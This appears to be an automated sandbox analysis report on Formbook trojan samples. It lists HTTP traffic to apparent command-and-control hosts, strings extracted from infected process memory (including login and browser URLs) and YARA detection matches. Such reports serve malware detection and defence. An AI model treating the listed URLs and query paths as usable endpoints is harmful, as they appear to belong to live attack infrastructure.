                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIrZnvP848ss291UZKTCSye2pq7CFXqXPQ3nvJk9XoSkPw%2BdrfA7E6Hqw%2B90U0pfYlwibpFcomNac5WkjrGcmo5kFHunZxgsd%2Fs2F8%2B%2BqC64YzV7sL7309FaAQQVt%2B0%2BWtOKpF6JGvRFdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89c816acecfc3300-EWR
                alt-svc: h3=":443"; ma=86400
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:25:04 GMT
                Server: Apache
                Content-Length: 196
                Content-Type: text/html; charset=iso-8859-1
                X-Onecom-Cluster-Name:
                X-Varnish: 18455855971
                Age: 0
                Via: 1.1 webcache2 (Varnish/trunk)
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:25:07 GMT
                Server: Apache
                Content-Length: 196
                Content-Type: text/html; charset=iso-8859-1
                X-Onecom-Cluster-Name:
                X-Varnish: 18437441792
                Age: 0
                Via: 1.1 webcache2 (Varnish/trunk)
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:25:09 GMT
                Server: Apache
                Content-Length: 196
                Content-Type: text/html; charset=iso-8859-1
                X-Onecom-Cluster-Name:
                X-Varnish: 18289636085
                Age: 0
                Via: 1.1 webcache2 (Varnish/trunk)
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:25:12 GMT
                Server: Apache
                Content-Length: 196
                Content-Type: text/html; charset=iso-8859-1
                X-Onecom-Cluster-Name:
                X-Varnish: 18204808545
                Age: 0
                Via: 1.1 webcache2 (Varnish/trunk)
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 01 Jul 2024 17:25:17 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 01 Jul 2024 17:25:20 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 01 Jul 2024 17:25:23 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:30 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 
30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:33 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 
30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:35 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 
30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:39 GMTConnection: closeContent-Length: 1245
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:12 GMTConnection: closeContent-Length: 1245
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:15 GMTConnection: closeContent-Length: 1245
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:17 GMTConnection: closeContent-Length: 1245
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:20 GMTConnection: closeContent-Length: 1245
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:27:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
              Source: chkntfs.exe, 0000000E.00000002.3707027734.0000000005B20000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004170000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q
              Source: aj34fjqh.exe, 00000018.00000002.3098875657.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 8hd98EhtIFcYkb8.exeString found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
              Source: 8hd98EhtIFcYkb8.exeString found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--gotopia-bya.com
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--gotopia-bya.com/ynea/
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
              Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: chkntfs.exe, 0000000E.00000003.1612857015.0000000007945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: chkntfs.exe, 0000000E.00000002.3707027734.00000000062FA000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.000000000494A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
              Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=ridcoredry.live
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

              E-Banking Fraud

              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
